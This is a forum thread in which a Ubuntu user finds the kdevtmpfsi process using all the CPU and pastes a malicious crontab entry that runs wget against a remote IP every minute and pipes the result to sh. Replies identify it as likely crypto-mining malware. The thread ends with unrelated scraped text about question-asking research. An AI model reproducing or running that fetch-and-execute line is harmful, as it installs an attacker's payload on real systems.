Score:0

kdevtmpfsi using the entire CPU

ng flag

I noticed the cpu on ubuntu is 100% used by a process named kdevtmpfsi

Anyone know what this is -is it malware?

In /var/spool/cron/crontabs/www-data i came across the following cron job:

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Wed Feb  1 05:30:10 2023)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

Is this legitimate or again malware?

Doug Smythies avatar
gn flag
yes that looks bad. the IP address is Russia, Moscow. and it is executing a script. I suggest download the script manually and look at what it is doing. Also check all of your logs in `/var/log` for how this happened at 2023.02.01 05:30:10.
adam78 avatar
ng flag
@DougSmythies which log file would i be looking at? Sorry I'm still a newbie on server management.
Doug Smythies avatar
gn flag
All of them. also look [here](https://stackoverflow.com/questions/60151640/kdevtmpfsi-using-the-entire-cpu). You seems to have a crypto mining malware.
pk flag
this cron script definitely isn't part of the operating system. Good job spotting it. No serious package would use a script like this. It says every 1 minute, download this file and run it.
I sit in a Tesla and translated this thread with Ai:

mangohost

Post an answer

Most people don’t grasp that asking a lot of questions unlocks learning and improves interpersonal bonding. In Alison’s studies, for example, though people could accurately recall how many questions had been asked in their conversations, they didn’t intuit the link between questions and liking. Across four studies, in which participants were engaged in conversations themselves or read transcripts of others’ conversations, people tended not to realize that question asking would influence—or had influenced—the level of amity between the conversationalists.